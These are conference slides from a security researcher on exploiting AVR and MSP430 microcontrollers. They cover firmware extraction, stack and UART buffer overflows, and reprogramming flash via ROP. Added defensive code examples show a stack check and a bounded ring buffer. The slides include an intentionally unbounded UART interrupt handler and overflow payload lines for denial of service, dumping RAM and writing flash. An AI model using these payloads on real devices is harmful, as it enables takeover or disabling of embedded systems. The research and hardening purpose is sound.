Vadim Bardakov - AVR & MSP exploitation
AVR & MSP exploitation
Vadim Bardakov, Security Researcher, Digital Security (ERPScan)
Why now?
© 2002—2013, Digital Security
• Increasing usage of microcontrollers (uC)
• Nobody cares about code security for these devices
• Increasing amount of easily accessible data channels
• Microcontroller firmware can be retrieved
Jokes
What if it works?
Oops…
(image-only slides)
Firmware extraction
Side channel attacks:
• Power analysis
• Planarization
• etc.
Firmware extraction
MSP430:
• FRAM
• 5xx
• 6xx
RAM
(figure: MSP vs. AVR memory layout)
RAM
AVR data memory map, in address order:
• General purpose registers
• I/O Special Function Registers
• Additional I/O registers
• Internal RAM
Stack errors
Same memory map as above: general purpose registers, I/O Special Function Registers, additional I/O registers, internal RAM.
• SP: the stack sits at the top of internal RAM and grows down toward the register area
• Interrupt handlers push their frames onto the same stack: UART, timers, comparators, INT0..X
• Stack data reaching the I/O registers (figure: region filled with 0xFF and 0x00): reconfiguring peripheral devices… Lost control
• The same overflow with the region filled with 0x20: reconfiguring peripheral devices… Seems OK
• Global variables in internal RAM: unknown offset
• Bypassing checks
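Added example, not from the talk: a stack-painting high-water-mark check that catches the condition these slides describe (interrupt frames pushing the stack down toward the I/O registers) before peripherals get reconfigured. The region size, paint byte and margin are constructed values; the SRAM region is a host array so the code runs anywhere.

```c
/* Stack high-water-mark check, an added example that is not from the talk.
 * On AVR the stack starts at the top of internal SRAM and grows down toward
 * the I/O register area shown above it in the memory map, and every nested
 * UART/timer/comparator/INTx handler pushes a frame onto it. Painting the
 * free region at reset and later scanning for the first overwritten byte
 * shows how close the stack has come to the registers. The free SRAM region
 * is modelled as a host array so the code runs on any machine. */
#include <stdint.h>
#include <stddef.h>

#define SRAM_FREE_SIZE 256u /* constructed: bytes between end of .bss and RAMEND */
#define STACK_PAINT    0xAAu
#define STACK_MARGIN   32u  /* constructed policy: warn when this little is left */

static uint8_t sram_free[SRAM_FREE_SIZE]; /* sram_free[SRAM_FREE_SIZE-1] plays RAMEND */

/* Run once at reset, before interrupts are enabled. */
void stack_paint(void)
{
    for (size_t i = 0; i < SRAM_FREE_SIZE; i++) sram_free[i] = STACK_PAINT;
}

/* Bytes below the deepest stack write that still hold the paint. Scans from
 * the low end upward; a frame that happens to push 0xAA bytes is invisible,
 * which is the known blind spot of this technique. Zero means the stack has
 * already run off the free region into whatever lies below it. */
size_t stack_untouched_bytes(void)
{
    size_t n = 0;
    while (n < SRAM_FREE_SIZE && sram_free[n] == STACK_PAINT) n++;
    return n;
}

/* Nonzero when the high-water mark is inside the safety margin; poll it from
 * the main loop and log or reset before peripheral registers get clobbered. */
int stack_near_overflow(void)
{
    return stack_untouched_bytes() < STACK_MARGIN;
}

/* Host-side model of pushes: writes 'bytes' bytes of 'value' below *sp the
 * way an interrupt frame does, stopping at the bottom of the region. */
void stack_model_push(size_t *sp, size_t bytes, uint8_t value)
{
    while (bytes-- > 0 && *sp > 0) sram_free[--*sp] = value;
}
```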
Buffer overflow
Access:
• Local variables
• Return address:
  • Compiler-generated instructions
  • Interruption
  • Bootloader
Buffer overflow
ISR(UART0_RECEIVE_INTERRUPT)
{
    UART_RxHead++;                         /* no bound check: the index keeps growing */
    UART_RxBuf[UART_RxHead] = UART0_DATA;  /* so received bytes land past the buffer */
}
Typical for UART handlers
Buffer overflow
000001FB CLI
000001FC RJMP PC-0x0000
print “\xff”xB . “\x01\0xFC”xN
Atmel Studio 6.1
Buffer overflow
print “\xff”xN
000001FB CLI
000001FC RJMP PC-0x0000
DoS
Buffer overflow
void uart_puts(const char *s)
{
    while (*s) uart_putc(*s++);
}
Dumping RAM: uart_puts(p);
000001C8 LDD R24,Y+1        Load indirect with displacement
000001CA LDD R25,Y+2        Load immediate
000001CB CALL 0x0000014E    Call subroutine
print “\xff”xB . “\x01\0xFC”xN. P
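Added example, not the talk's or any project's code: the receive ISR shown above rewritten as a bounded ring buffer, with a host-side burst feeder standing in for the UART data register. The buffer size, the overrun counter and the register/variable names are assumptions modelled on the slide's snippet.

```c
/* Hardened UART receive path, an added example that is not the talk's code.
 * The ISR shown above does UART_RxHead++ with no bound, so the index walks
 * off UART_RxBuf into whatever follows it in SRAM. Here the ring is a power
 * of two indexed through a mask, a full ring drops the byte and counts the
 * overrun instead of writing past the end, and only the consumer moves the
 * tail. The data register is a parameter so it runs on a host; the target's
 * vector would be ISR(UART0_RECEIVE_INTERRUPT) { (void)uart_rx_isr(UART0_DATA); } */
#include <stdint.h>
#include <stdbool.h>

#define UART_RX_BUFFER_SIZE 16u                  /* must be a power of two */
#define UART_RX_BUFFER_MASK (UART_RX_BUFFER_SIZE - 1u)

static volatile uint8_t  UART_RxBuf[UART_RX_BUFFER_SIZE];
static volatile uint8_t  UART_RxHead;     /* written by the ISR only */
static volatile uint8_t  UART_RxTail;     /* written by the consumer only */
static volatile uint16_t UART_RxOverruns; /* dropped bytes: a flood/DoS signal */

/* Returns true when the byte was stored, false when it was dropped. */
bool uart_rx_isr(uint8_t data)
{
    uint8_t next = (uint8_t)((UART_RxHead + 1u) & UART_RX_BUFFER_MASK);
    if (next == UART_RxTail) {            /* ring full: drop, never index past the buffer */
        if (UART_RxOverruns != UINT16_MAX) UART_RxOverruns++;
        return false;
    }
    UART_RxBuf[UART_RxHead] = data;       /* index is always < UART_RX_BUFFER_SIZE */
    UART_RxHead = next;
    return true;
}

/* Consumer side; 8-bit indices read atomically on AVR, so no masking needed. */
bool uart_getc(uint8_t *out)
{
    if (UART_RxTail == UART_RxHead) return false;
    *out = UART_RxBuf[UART_RxTail];
    UART_RxTail = (uint8_t)((UART_RxTail + 1u) & UART_RX_BUFFER_MASK);
    return true;
}

/* Feeds n bytes with nobody draining the ring (the talk's "\xff" x N input)
 * and returns how many were actually stored rather than dropped. */
unsigned uart_rx_burst(unsigned n, uint8_t value)
{
    unsigned stored = 0;
    while (n-- > 0)
        if (uart_rx_isr(value)) stored++;
    return stored;
}
```

A rising UART_RxOverruns with an idle consumer is the cheap runtime indicator that the link is being flooded, which is the signal the original handler could never give.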
Reprogramming
Open-source bootloaders suck in production.
Reprogramming
print “\xff”xB . “\x00\0x16”xN. ROPTail
Load code to RAM
Interruption handler: ideal for ROP
Reprogramming
Writing code to FLASH:
+00000343: 95E8 SPM Store program memory
….
+00000351: 95E8 SPM Store program memory
print Code . “\x00\0xFC”xN. P
Gain control to SPM
Atmex
Summary
• Simple attacks can be conducted blindly
• Different consequences:
  • DoS
  • Modifying device configuration
  • etc.
www.dsec.ru
www.erpscan.com
[email protected]
Digital Security in Moscow: +7 (495) 223-07-86
Digital Security in Saint Petersburg: +7 (812) 703-15-47